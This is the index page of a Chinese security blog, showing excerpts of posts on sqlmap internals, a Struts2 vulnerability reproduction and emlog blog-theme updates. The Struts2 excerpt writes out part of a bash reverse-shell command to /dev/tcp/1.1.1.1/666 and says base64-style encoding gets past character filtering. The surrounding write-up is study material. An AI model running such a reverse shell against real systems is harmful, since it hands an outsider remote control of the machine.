小草窝博客

2018-11-30阅读(5994)评论(0)

一直在想为什么sqlmap能成为一款优秀的工具？而我写的却不行？sqlmap究竟有什么特殊之处？今天探索发现带大家寻找sqlmap的一些神秘细节。 bigarray 大数组当你使用dump命令导出数据的时候，有没有想过即使百万行数据sqlmap也可以导出来？从软件开发的思路来说，为了方便管理数据，会将数据存储在内存中，如果百万条数据存在内存中势必会导致内存...

2018-11-24阅读(9206)评论(6)

又是周五，晚上和往常一样无聊，在网上乱翻，又进到了P牛的博客https://www.leavesongs.com/，有句话是不是叫跟着前人的脚步好乘凉？于是点到了最后一页，时间定格在2012年12月13日，内容似乎是刚开学，并且最后这句 我希望自己快快学到更多，在大学里能快快成长。 感觉和我刚入大学时候何其类似。于...

2018-11-23阅读(7647)评论(1)

sqlmap1.0 源码解析 前面学习了最初版本的sqlmap，了解了大概的注入流程，同时也知道了大概的sqlmap的结构，这次学习一下sqlmap1.0的源码，看看相比之前的注入流程变化了多少，相比之前的设计增加了哪些东西以及看看sqlmap代码结构设计精巧的地方。 博主加：这篇文章已经写了好久了，但是发博客的话...

2018-11-20阅读(7811)评论(0)

0x01在复现struts2遇到的问题，用命令执行反弹shell的时候总是失败，经过很久的测试，怀疑是"、<>等字符出现了问题。 0x02经过漫长的探索，和公开发布的poc中的payload，找到了绕过的方法，可以用类似base64编码的方式来绕过。比如bash -c 'sh -i >& /dev/tcp/1.1.1.1/666 ...

2018-11-18阅读(5482)评论(2)

改装博客因为一些数据的历史性，加上也不想在折腾其他博客了，本来想自己写个博客的，但那时因为之前自己域名在国外，速度很慢，想做成静态化减小资源压力。但现在博客以及在国内备案，用腾讯云学生主机还是绰绰有余，所以没有自己造轮子的必要了，主要是解决一下emlog长久不更新内心存在的”不安全感”。 原系统中好多功能可以更加优美，加上漏洞部分，所以我决定对博客系统...

2018-11-17阅读(13288)评论(52)

emlog大前端社区版是emlog大前端的免费版本，仅用于个人博客 这次社区版终于更新了，因为F3.x版本已经年久失修，这次直接拿的4.9版本的内核作出的修改。在一些体验、样式和交互上会看到和4.9的体验几乎一样。 下载方式 但是相比于收费版本，社区...

2018-11-13阅读(3962)评论(3)

博客域名已经备案完成，服务将会迁移到国内了。 近期会把之前挖的坑填上，正式更新emlog大前端4.9以及免费版。 因为最近博主十分喜欢Markdown这种日记方式，虽然emlog有Markdown编辑器相关的插件，但是还是需要我二次编辑图片等内容，这太不爽了。后期会在保留原始数据的基础上开发一个可以直接调用Markdown操作的博客系统。